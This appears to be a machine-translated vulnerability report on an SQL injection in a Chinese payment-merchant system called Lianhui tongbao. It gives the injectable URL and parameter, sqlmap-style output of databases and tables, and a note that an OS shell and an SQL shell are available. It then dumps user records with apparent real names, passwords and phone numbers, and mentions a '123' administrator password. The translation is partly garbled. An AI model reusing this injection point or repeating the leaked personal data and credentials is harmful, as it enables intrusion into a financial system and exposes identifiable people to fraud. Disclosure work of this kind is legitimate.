Lianhui tongbao system SQL injection (involving 4000 merchants/business licenses/ID cards/bank cards/verification codes and other information)
Detailed description:
The manufacturer is lianhui tongbao.
Injection
Http://mpos.unionpay.so: 8383/manager/system/noticeContent. aspx? Action = view & id = 13 & target = mpos id =
Back-end DBMS: Microsoft SQL Server 2008
Available databases [10]:
[*] Channel
[*] Distribution
[*] Dy_cd_lhtb
[*] Lhtmposmerchant
[*] Master
[*] Model
[*] Msdb
[*] Railroad
[*] Tempdb
[*] Trainsms
Executable-OS-shell
SQL-shell
Existing table:
Code Region
Database: lhtmposmerchant[79 tables]+-------------------------------+| db_area || db_billorder_record || db_bulletin || db_channel_applyUsheild || db_channel_dayprofit || db_channel_product_costconfig || db_channel_product_type || db_channel_profitstatistics || db_channel_rechargelog || db_city || db_credit_usedquota || db_lhb_user || db_lhbblackgold_jsrecord || db_lhbblackgold_profit || db_lhbdebit_credit_order || db_lhbgold_profit || db_lhbjhc_jsrecord || db_lhbjhc_profit || db_lhbjhf_jsrecord || db_lhbjhf_profit || db_lhbjhn_jsrecord || db_lhbjhn_profit || db_lhbjht_jsrecord || db_lhbjht_profit || db_lhbjhy_jsrecord || db_lhbjhy_profit || db_lhbptgold_jsrecord || db_lhbptgold_profit || db_lhbrate_config || db_lhbsilver_profit || db_lhbvipos_order || db_lhbwhitegold_profit || db_lhbyz_channelrate || db_lhbyzrate_config || db_lhmall_order_product || db_lhmall_order_product || db_lhplaneTicket_order || db_lhtmpos_billlog || db_lhtmpos_billorder || db_lhtmpos_order || db_lhtmpos_txnorder || db_lhtrainTicket_order || db_lhtrate_config || db_lhtvipos_order || db_lhtvipos_rates || db_liquidationbankcode || db_log || db_member || db_menu || db_merchant_config || db_mpos_channelassign || db_mpos_channelassign || db_mpos_channelrate || db_mpos_lhbrate || db_mpos_merchant || db_mpos_terminal || db_newlhb_user || db_noqrhmobile || db_pay_product_log || db_power || db_product_apply || db_product_buyrecords || db_product_class || db_product_data || db_product_salecost_config || db_product_salecost_config || db_product_saleman || db_province || db_role || db_sellagency || db_sms_send || db_sms_wait || db_subdistributor || db_tempmobile || db_terminal_user || db_user || db_vipuser_rate || db_youze_profitstatistics || sqlmapoutput |+-------------------------------+
Some users
Code Region
Select * from db_user [36]: [*] 01 2 2014, 448, 1, VIPOS-tao Shanzhong, 176335, 9, 3, 0, 0, 13032191313 [*] 01 2 2014, 449, 1, VIPOS-Wang xiaohe, wxh800918, 9, 3, 0, 0, 15312155678 [*] 01 2 2014, 450, 1, VIPOS-Xu Yuhong, 218321, 9, 3, 0, 0, 13962412277 [*] 01 2 2014, 451, 1, VIPOS-Chen Fang, 206323, 9, 3, 0, 0, 18962636627 [*] 01 2 2014 ,, 452, 1, VIPOS-ji Hai, 192179, 9, 3, 0, 0, 15618389748 [*] 01 2 2014 PM, 453, 1, VIPOS-hu guohong, 242510, 9, 3, 0, 0, 15901994055 [*] 01 2 2014 PM, 454, 1, VIPOS-Jiang Hai, 103619, 9, 3, 0, 0, 18914950187 [*] 01 2 2014 AM, 447, 1, VIPOS-olingchi, 250546, 9, 3, 0, 0, 13611933901 [*] 01 3 2014 PM, 456, 1, VIPOS-Wang Cheng Jun, 043210, 9, 3, 0, 0, 13882177061 [*] 01 3 2014, 457, 1, VIPOS-wu huihong, 096026, 9, 3, 0, 0, 15800359836 [*] 01 3 2014 AM, 455, 1, VIPOS-pure, 017533, 9, 3, 0, 0, 13732671518 [*] 01 6 2014 PM, 461, 1, VIPOS-gan Lin, 220042, 9, 3, 0, 0, 13939945338 [*] 01 6 2014 PM ,, 462, 1, VIPOS-huge river, 249180, 9, 3, 0, 0, 13375151875 [*] 01 6 2014 PM, 463, 1, VIPOS- Li, 8888, 8, 2, 1, 0, peixueli [*] 01 6 2014 PM, 464, 1, VIPOS-example, 01724X, 9, 3, 0, 0, 13983211607 [*] 01 6 2014, 465, 1, VIPOS-yang Zuli, 160885, 9, 3, 0, 0, 13698886899 [*] 01 6 2014 PM, 468, 1, VIPOS-ding yuju, 075827, 9, 3, 0, 0, 13906282112 [*] 01 6 2014 AM, 459, 1, VIPOS-sun Peipei, 030489, 9, 3, 0, 0, 18616122858 [*] 01 6 2014 AM, 458, 10, Wang xiabai-finance, 123, 5, 1, 0, 0, wangxiabai [*] 01 6 2014 PM, 460, 1, VIPOS-jiang kangjun, 20641X, 9, 3, 0, 0, 18962887688 [*] 01 6 2014 PM, 460, 1, VIPOS-jiang kangjun, 20641X, 9, 3, 0, 0, 18962887688 [*] 01 6 2014 PM, 460, 1, VIPOS-jiang kangjun, 20641X, 9, 3, 0, 0, 18962887688 [*] 01 6 2015 AM, 1392, 1, VIPOS-RHXT Liu Lin, 115411, 9, 3, 0, 0, 13458678768 [*] 01 7 2014 PM ,, 470, 1, VIPOS-lu Junhua, 280813, 9, 3, 0, 0, 15001991029 [*] 01 7 2014 PM, 470, 1, VIPOS-lu Junhua, 280813, 9, 3, 0, 0, 15001991029 [*] 01 7 2014 PM, 470, 1, VIPOS-lu Junhua, 280813, 9, 3, 0, 0, 15001991029 [*] 01 7 2014, 472, 1, VIPOS-Tang qiuer, 8888, 8, 2, 1, 0, tangqiuer [*] 01 7 2014 AM, 115, 1, VIPOS-Li wenjuan, 8888, 8, 2, 1, 0, liwenjuan [*] 01 7 2014 PM ,, 469, 1, VIPOS-Wang xiaohe, 8888, 8, 2, 1, 0, wangxiaohe [*] 01 7 2015 PM, 1397, 1, VIPOS-RHXT Lou Xiaoqian, 115411, 9, 3, 0, 0, 15881576086 [*] 01 7 2015 PM, 1398, 1, VIPOS-Dong Fan, 115411, 9, 3, 0, 0, 15928406481 [*] 01 7 2015 AM, 1395, 1, VIPOS-feng peak, 264911, 9, 3, 0, 0, 13541222112 [*] 01 7 2015 AM, 1396, 1, VIPOS-Liu Changjian, 264911, 9, 3, 0, 0, 13540490546 [*] 01 8 2014 AM, 474, 1, VIPOS-lu Wenjun, socl8899, 9, 3, 0, 0, 13918788846 [*] 01 8 2014 AM, 475, 1, VIPOS-Zhang jinfeng, 015042, 9, 3, 0, 0, 13918190877 [*] 01 8 2014 AM ,, 477, 1, VIPOS-Wang lingfeng, 118913, 8, 2, 1, 0, wlf
Most of the passwords are simple, and the Administrator has 123 weak passwords.
Verification codes can be sent in the background, and text messages can be sent. Can verification be seen?
You can view other user passwords,
Leakage of user information
Proof of vulnerability: